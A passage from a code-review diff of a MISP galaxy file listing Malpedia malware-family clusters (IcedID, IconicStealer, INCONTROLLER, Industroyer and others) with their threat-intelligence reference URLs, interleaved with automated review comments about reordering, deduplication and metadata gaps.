+ "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan",
+ "https://intel471.com/blog/malvertising-surges-to-distribute-malware",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
+ "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b",
+ "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/",
+ "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html",
+ "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/",
+ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1",
+ "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot",
+ "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://forensicitguy.github.io/analyzing-icedid-document/",
+ "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
+ "https://www.group-ib.com/blog/icedid",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
+ "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/",
+ "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/",
+ "https://cert.gov.ua/article/39609",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ",
+ "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id",
+ "https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/",
+ "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/",
+ "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html",
+ "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes"
+ "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
+ "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
+ "https://www.youtube.com/watch?v=oZ4bwnjcXWg",
+ "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/",
+ "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/",
+ "https://twitter.com/Unit42_Intel/status/1645851799427874818",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid",
+ "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary",
+ "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html",
+ "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
+ "https://www.team-cymru.com/post/from-chile-with-malware",
+ "https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html",
+ "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766",
+ "https://www.youtube.com/watch?v=7Dk7NkIbVqY",
+ "https://www.youtube.com/watch?v=wMXD4Sv1Alw",
+ "https://tccontre.blogspot.com/2021/01/",
+ "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims",
+ "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol",
+ "https://netresec.com/?b=214d7ff",
+ "https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/",
+ "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html",
+ "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros",
+ "https://isc.sans.edu/diary/28636",
+ "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak",
+ "https://www.elastic.co/security-labs/unpacking-icedid",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf",
+ "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
+ "https://isc.sans.edu/diary/rss/28934",
+ "https://www.youtube.com/watch?v=wObF9n2UIAM",
+ "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
+ "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884",
+ "https://blog.minerva-labs.com/icedid-maas",
+ "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back"
],
"synonyms": [
"BokBot",
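Review bot: most of this hunk is churn rather than change. Nearly every pre-existing ref is deleted and re-inserted unchanged in a different position (for example `https://unit42.paloaltonetworks.com/atoms/monsterlibra/` and `https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/` both appear as a `-` line and again as a `+` line), which buries the genuine additions such as the Elastic, NVISO, Team Cymru BackConnect and netresec write-ups. Have the generator sort `refs` deterministically before writing so that regenerating the cluster only diffs real additions and removals. While here, dedupe by normalized URL: the embee_research tweet is listed twice, once as `https://twitter.com/embee_research/status/1592067841154756610?s=20` and once with `&t=hEALPAWr1LIt9pXcVpxjRQ` appended, and ISC diary 29740 appears both as `https://isc.sans.edu/diary/29740` and as `https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/`. Stripping `utm_*`, `s=` and `t=` tracking parameters before comparison would catch the first case (the CrowdStrike carbon-spider URL also still carries `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`). Finally, `https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view` deserves a second look: an unattributed Drive share is neither a stable nor an auditable source for a threat-intel cluster, so either replace it with the publisher's own URL or document why it is kept.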
@@ -27071,9 +28630,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader",
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
"http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://threatray.com/blog/a-new-icedid-gziploader-variant/",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"
+ "https://threatray.com/blog/a-new-icedid-gziploader-variant/"
],
"synonyms": [],
"type": []
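Review bot: this hunk is reorder-only. The three refs in `win.icedid_downloader` are unchanged; the SecurityIntelligence and Threatray URLs merely swap positions, so the hunk adds review noise without changing the cluster. Emitting `refs` in a stable sorted order in the generator would make hunks like this one (and the equally reorder-only icefog, ice_ix and iisniff hunks in this patch) disappear on regeneration.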
@@ -27086,12 +28645,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
- "http://www.kz-cert.kz/page/502",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "http://www.kz-cert.kz/page/502",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko"
],
"synonyms": [
"Fucobha"
@@ -27119,10 +28678,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
- "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/",
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus",
- "https://securelist.com/ice-ix-not-cool-at-all/29111/"
+ "https://securelist.com/ice-ix-not-cool-at-all/29111/",
+ "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/"
],
"synonyms": [],
"type": []
@@ -27143,6 +28702,23 @@
"uuid": "4f7ae3da-948c-4f74-8229-d5d7461f9c7d",
"value": "IconDown"
},
+ {
+ "description": "Follow-up payload in 3CX supply chain incident, which according to Volexity is an infostealer collecting information about the system and browser using an embedded copy of the SQLite3 library.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
+ "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
+ "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
+ "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "24fed92f-7e8f-449f-857f-d409d3bf8b48",
+ "value": "IconicStealer"
+ },
{
"description": "",
"meta": {
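Review bot: the new IconicStealer entry is structurally consistent with its neighbours (`description`, `meta.refs` led by the Malpedia details URL, empty `synonyms` and `type`, `uuid`, `value`), but `synonyms` should not stay empty if the listed sources name the family differently. The description attributes the infostealer characterisation to Volexity alone while Mandiant, Symantec, ESET and Trend Micro posts are cited for the same payload; check those write-ups for alternative spellings or casings of the name and add them so lookups resolve. Also confirm the `uuid` `24fed92f-7e8f-449f-857f-d409d3bf8b48` was freshly generated and is unique across the galaxy, since duplicated UUIDs break MISP imports silently.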
@@ -27175,10 +28751,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
"https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
- "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf"
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
],
"synonyms": [],
"type": []
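Review bot: this hunk is a net-zero change: the same four iisniff URLs are removed and re-added in a different order (the Trustwave post moves from second to last, the Black Hat whitepaper moves up). Nothing to merge here on its own; a deterministic ref ordering in the generator would make this and the similar hunks below disappear.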
@@ -27206,8 +28782,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab",
- "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
],
"synonyms": [],
"type": []
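Review bot: another reorder with no content change (the two LeafMiner refs swap places). Those two URLs carry the same slug on symantec.com and on the broadcom mirror and appear to be the same post at its old and migrated location; if the generator can normalise migrated Symantec URLs, keep only the canonical one instead of carrying both.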
@@ -27220,16 +28796,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
- "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
- "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
- "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/",
+ "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
"https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/"
],
"synonyms": [],
"type": []
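Review bot: the eight removed and eight added lines for imminent_monitor_rat are the identical set of URLs in a different order, so this hunk changes nothing for consumers of the galaxy. Same fix as above: sort `refs` on export so the diff only shows genuine additions and removals.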
@@ -27250,6 +28826,20 @@
"uuid": "5f688e85-5f33-4ae6-880a-fc2e5146dd28",
"value": " Immortal Stealer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.incontroller",
+ "https://www.mandiant.com/resources/blog/cyber-operations-russian-vulkan",
+ "https://twitter.com/silascutler/status/1514366443277766656"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3ed3e880-1b93-4ca2-9e9d-0e429c4c895f",
+ "value": "INCONTROLLER"
+ },
{
"description": "Keylogger written in Visual Basic dating back to at least 2012.",
"meta": {
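Review bot: the new INCONTROLLER entry ships with an empty `description` while the other entries added in this patch (IconicStealer, IronNetInjector) carry one; Malpedia has descriptive text for this family, so it should be pulled through rather than left blank, otherwise the cluster shows up in MISP with no context beyond the name. Unrelated but visible in the context lines: the preceding entry's value is `" Immortal Stealer"` with a leading space, which will produce an odd `misp-galaxy:malpedia=" Immortal Stealer"` tag; worth stripping whitespace from `value` in the generator as a separate fix.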
@@ -27296,26 +28886,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
"https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
- "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
- "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://en.wikipedia.org/wiki/Industroyer",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://cert.gov.ua/article/39518",
- "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
+ "https://cert.gov.ua/article/39518",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
+ "https://en.wikipedia.org/wiki/Industroyer",
+ "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too"
],
"synonyms": [
"Crash",
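Review bot: the only genuine addition in this Industroyer hunk is `https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics`, and a FIN11 red-team emulation write-up is an odd reference for an ICS-targeting Sandworm family; please confirm Malpedia actually lists it under win.industroyer before merging, since a mis-associated ref here will be copied into every downstream MISP instance. The other 20 removed/added lines are the existing refs in a new order.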
@@ -27331,24 +28922,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2",
- "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis",
- "https://blog.scadafence.com/industroyer2-attack",
- "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/",
- "https://pylos.co/2022/04/23/industroyer2-in-perspective/",
- "https://cert.gov.ua/article/39518",
- "https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure",
- "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/",
"https://twitter.com/silascutler/status/1513870210398363651",
"https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf"
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/",
+ "https://blog.scadafence.com/industroyer2-attack",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://cert.gov.ua/article/39518",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf",
+ "https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks",
+ "https://pylos.co/2022/04/23/industroyer2-in-perspective/"
],
"synonyms": [],
"type": []
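Review bot: the Trustwave overview is kept twice, once without and once with a trailing slash (`.../overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` and `.../overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/`); the generator should normalise trailing slashes and dedupe so the same page is not listed twice. The four real additions (YouTube talk, M-Trends 2023, the Microsoft hybrid-warfare PDF, Google's fog-of-war report) are plausible Industroyer2 sources; the rest of the hunk is reordering.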
@@ -27387,15 +28982,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.infy",
- "https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf",
- "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/",
- "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
- "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
"http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
- "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/",
